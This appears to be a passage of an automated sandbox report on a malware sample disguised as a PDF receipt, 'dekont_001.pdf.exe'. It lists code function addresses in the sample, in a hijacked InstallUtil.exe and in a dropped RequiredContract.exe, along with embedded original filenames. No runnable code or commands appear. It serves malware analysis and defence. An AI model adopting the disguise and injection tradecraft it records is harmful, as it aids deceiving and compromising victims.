              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_071000070_2_07100007
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_071000400_2_07100040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010A61201_2_010A6120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AF0171_2_010AF017
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AB3381_2_010AB338
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AC4571_2_010AC457
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010A67481_2_010A6748
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AC7611_2_010AC761
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AB7E21_2_010AB7E2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010A46D91_2_010A46D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010A98681_2_010A9868
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010ACA411_2_010ACA41
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010ABAC01_2_010ABAC0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010ABDA01_2_010ABDA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AB5021_2_010AB502
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AE5271_2_010AE527
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AE5381_2_010AE538
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010A35701_2_010A3570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_010AC4801_2_010AC480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A7B701_2_066A7B70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A84601_2_066A8460
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A38701_2_066A3870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A00401_2_066A0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A11C01_2_066A11C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AFA681_2_066AFA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AC6481_2_066AC648
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AFA591_2_066AFA59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AC6381_2_066AC638
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AF6001_2_066AF600
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AF6101_2_066AF610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ACEEA1_2_066ACEEA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ACEF81_2_066ACEF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ACAA01_2_066ACAA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AD3401_2_066AD340
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AD3501_2_066AD350
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A73E81_2_066A73E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ADBF11_2_066ADBF1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A73D81_2_066A73D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AD7A81_2_066AD7A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AD7981_2_066AD798
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A38601_2_066A3860
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE0491_2_066AE049
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE0581_2_066AE058
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ADC001_2_066ADC00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A00061_2_066A0006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A001E1_2_066A001E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AB4E81_2_066AB4E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE8F81_2_066AE8F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A08F01_2_066A08F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AB4D71_2_066AB4D7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A04A01_2_066A04A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE4A01_2_066AE4A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE4B01_2_066AE4B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A04901_2_066A0490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A0D601_2_066A0D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AED601_2_066AED60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AB9401_2_066AB940
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AED501_2_066AED50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A0D511_2_066A0D51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AB9301_2_066AB930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AE9081_2_066AE908
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A09001_2_066A0900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AC1E01_2_066AC1E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AC1F01_2_066AC1F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AF1A91_2_066AF1A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066AF1B81_2_066AF1B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A11B01_2_066A11B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ABD881_2_066ABD88
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066ABD981_2_066ABD98
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A7D901_2_066A7D90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DD6701_2_066DD670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DAA581_2_066DAA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D86081_2_066D8608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DB6E81_2_066DB6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DC3881_2_066DC388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D8C511_2_066D8C51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D70501_2_066D7050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DD0281_2_066DD028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DA4081_2_066DA408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DB0A01_2_066DB0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DBD381_2_066DBD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DC9D81_2_066DC9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D11A01_2_066D11A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D5A601_2_066D5A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DD6621_2_066DD662
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D5A701_2_066D5A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DAA531_2_066DAA53
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D560A1_2_066D560A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D56181_2_066D5618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D5EC81_2_066D5EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DB6D91_2_066DB6D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D5EB81_2_066D5EB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D67781_2_066D6778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DC3781_2_066DC378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D63201_2_066D6320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D37301_2_066D3730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D63121_2_066D6312
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DA3F81_2_066DA3F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D6BC11_2_066D6BC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D6BD01_2_066D6BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D33A81_2_066D33A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D33B81_2_066D33B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D70401_2_066D7040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D00401_2_066D0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D44301_2_066D4430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D00071_2_066D0007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D28071_2_066D2807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D28181_2_066D2818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DD0181_2_066DD018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D08E01_2_066D08E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D78F01_2_066D78F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D08F01_2_066D08F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D74A81_2_066D74A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D04881_2_066D0488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D04981_2_066D0498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D74971_2_066D7497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DB0901_2_066DB090
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D0D481_2_066D0D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D7D481_2_066D7D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D7D581_2_066D7D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DBD281_2_066DBD28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D0D391_2_066D0D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D79001_2_066D7900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D85F81_2_066D85F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066DC9C81_2_066DC9C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D81A01_2_066D81A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D81B01_2_066D81B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D518A1_2_066D518A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D51981_2_066D5198
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_02FB2FE06_2_02FB2FE0
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_02FB02CD6_2_02FB02CD
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_02FBE6406_2_02FBE640
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_077AE4906_2_077AE490
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_077900406_2_07790040
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_077900166_2_07790016
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_010861087_2_01086108
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108C1907_2_0108C190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108F0077_2_0108F007
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108B3287_2_0108B328
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108C4707_2_0108C470
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_010867307_2_01086730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108C7517_2_0108C751
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_010898587_2_01089858
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108BBD27_2_0108BBD2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108CA317_2_0108CA31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_01084AD97_2_01084AD9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108BEB07_2_0108BEB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108E5177_2_0108E517
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108E5287_2_0108E528
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_010835707_2_01083570
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0108B4F27_2_0108B4F2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650AA587_2_0650AA58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650D6707_2_0650D670
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065086087_2_06508608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650B6E87_2_0650B6E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650C3887_2_0650C388
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06508C517_2_06508C51
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650A4087_2_0650A408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650D0287_2_0650D028
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650B0A07_2_0650B0A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650BD387_2_0650BD38
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650C9D87_2_0650C9D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065011A07_2_065011A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650AA487_2_0650AA48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06505A707_2_06505A70
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06505A607_2_06505A60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650D6627_2_0650D662
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065056187_2_06505618
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650560B7_2_0650560B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650B6D97_2_0650B6D9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06505EC87_2_06505EC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06505EB87_2_06505EB8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065067787_2_06506778
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650C3787_2_0650C378
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065063137_2_06506313
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065037307_2_06503730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065063207_2_06506320
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06506BD07_2_06506BD0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06506BC17_2_06506BC1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650A3F87_2_0650A3F8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065033B87_2_065033B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065033A87_2_065033A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065070507_2_06507050
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065000407_2_06500040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065070407_2_06507040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065028187_2_06502818
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650D0187_2_0650D018
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065000067_2_06500006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065028077_2_06502807
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065044307_2_06504430
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065008F07_2_065008F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065078F07_2_065078F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065008E07_2_065008E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065074977_2_06507497
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065004987_2_06500498
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065004887_2_06500488
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650B08F7_2_0650B08F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065074A87_2_065074A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06507D587_2_06507D58
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06500D487_2_06500D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06507D487_2_06507D48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065079007_2_06507900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_06500D397_2_06500D39
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650BD287_2_0650BD28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650C9C87_2_0650C9C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065085FC7_2_065085FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065011917_2_06501191
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065051987_2_06505198
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_0650518B7_2_0650518B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065081B07_2_065081B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 7_2_065081A07_2_065081A0
              Source: dekont_001.pdf.exe, 00000000.00000000.1735555803.0000000000552000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1842745906.00000000063E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002887000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1845547281.0000000007120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003838000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1828392738.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002CB9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKhexj.dll" vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exeBinary or memory string: OriginalFilenameQxqefzci.exe2 vs dekont_001.pdf.exe
              Source: dekont_001.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
